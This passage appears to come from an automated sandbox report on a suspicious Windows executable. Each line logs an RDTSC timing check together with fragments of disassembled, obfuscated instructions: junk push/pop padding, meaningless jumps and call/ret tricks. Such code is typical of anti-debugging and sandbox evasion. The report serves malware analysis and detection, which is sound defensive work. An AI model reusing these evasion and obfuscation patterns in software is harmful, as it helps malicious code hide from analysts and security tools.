Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86AE second address: 8D86BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86BC second address: 8D86E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF1Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86E0 second address: 8D86F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F4 second address: 8D86F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D86F8 second address: 8D8702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8702 second address: 8D8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D883B second address: 8D8848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F5F64D1DAB8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8848 second address: 8D885B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F5F64D1DF16h 0x0000000b jnl 00007F5F64D1DF16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D885B second address: 8D8874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F5F64D1DABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8874 second address: 8D887C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D887C second address: 8D8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D8CE2 second address: 8D8CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ACC second address: 8D9ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8D9ADF second address: 8D9AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DA1DC second address: 8DA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DDA54 second address: 8DDA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89E299 second address: 89E2D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DABEh 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jg 00007F5F64D1DABCh 0x00000016 pushad 0x00000017 ja 00007F5F64D1DAB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFD86 second address: 8DFDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5F64D1DF24h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DEE87 second address: 8DEE91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8DFFFE second address: 8E0022 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DF26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E0022 second address: 8E0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jnl 00007F5F64D1DABCh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5F64D1DAC7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E5E38 second address: 8E5E43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F5F64D1DF16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E63B8 second address: 8E63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88D7 second address: 8E88DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88DC second address: 8E88E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E88E6 second address: 8E890F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 172FBC6Eh 0x00000013 jnl 00007F5F64D1DF1Ch 0x00000019 push BE287C2Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E890F second address: 8E8926 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A0B second address: 8E8A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8A11 second address: 8E8A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94C6 second address: 8E94CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94CC second address: 8E94FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5F64D1DABFh 0x0000000e xchg eax, ebx 0x0000000f movzx edi, dx 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop ebx 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E94FA second address: 8E9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9503 second address: 8E9507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E95DD second address: 8E95EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FD0 second address: 8E9FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E9FE7 second address: 8EA005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5F64D1DF16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBACF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB32B second address: 8EB33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EB33E second address: 8EB349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5F64D1DAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8ECD18 second address: 8ECD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1B2 second address: 8EF1C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8EF1C0 second address: 8EF1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F5F64D1DF2Eh 0x00000010 jmp 00007F5F64D1DF28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E8F second address: 8F1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1E94 second address: 8F1EB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007F5F64D1DF18h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1EB5 second address: 8F1F1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5F64D1DAB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+1245ED66h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F5F64D1DAB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 stc 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D29EBh] 0x0000004f xchg eax, esi 0x00000050 push edi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F1F second address: 8F1F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F1F23 second address: 8F1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DB9 second address: 8F2DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DBD second address: 8F2DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCB second address: 8F2DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCF second address: 8F2DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DD5 second address: 8F2E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F5F64D1DF18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007F5F64D1DF1Dh 0x00000045 push 00000000h 0x00000047 mov di, si 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jp 00007F5F64D1DF16h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F3D7E second address: 8F3DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e je 00007F5F64D1DAB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 pushad 0x00000019 mov dword ptr [ebp+122D1B00h], esi 0x0000001f clc 0x00000020 popad 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+12483267h], eax 0x00000029 push 00000000h 0x0000002b movsx ebx, ax 0x0000002e push eax 0x0000002f jo 00007F5F64D1DACDh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DA4 second address: 8F5DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DAD second address: 8F5DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DB8 second address: 8F5DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06C5 second address: 8B06D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5F64D1DAB8h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06D6 second address: 8B06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E1 second address: 8B06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E5 second address: 8B06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F5F64D1DF16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5F64D1DF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F631C second address: 8F6395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DACFh 0x00000008 jmp 00007F5F64D1DAC9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 je 00007F5F64D1DABCh 0x00000016 mov dword ptr [ebp+12450B5Eh], edx 0x0000001c push 00000000h 0x0000001e add dword ptr [ebp+122D3055h], eax 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F5F64D1DAB8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5F64D1DAC2h 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F6395 second address: 8F639B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F639B second address: 8F639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8390 second address: 8F8396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F7633 second address: 8F7638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F84FB second address: 8F8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8501 second address: 8F8586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F5F64D1DAC4h 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F5F64D1DAB8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov bx, dx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c push edi 0x0000003d movsx edi, ax 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, ecx 0x0000004a mov eax, dword ptr [ebp+122D13C1h] 0x00000050 add bl, 00000032h 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D1878h], eax 0x0000005b nop 0x0000005c jc 00007F5F64D1DAC8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F5F64D1DABAh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8586 second address: 8F85A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DF27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA405 second address: 8FA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA409 second address: 8FA42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DF29h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C1 second address: 8A32C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C5 second address: 8A3307 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 jmp 00007F5F64D1DF1Ch 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5F64D1DF1Fh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDAEF second address: 8FDAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFA36 second address: 8FFA40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 900A67 second address: 900A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDCFE second address: 8FDD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B64 second address: 901B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B7E second address: 901BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bh, 08h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D19D0h] 0x0000002e push 00000000h 0x00000030 or ebx, 0894BF9Bh 0x00000036 xchg eax, esi 0x00000037 jmp 00007F5F64D1DF1Fh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 je 00007F5F64D1DF16h 0x00000046 jnp 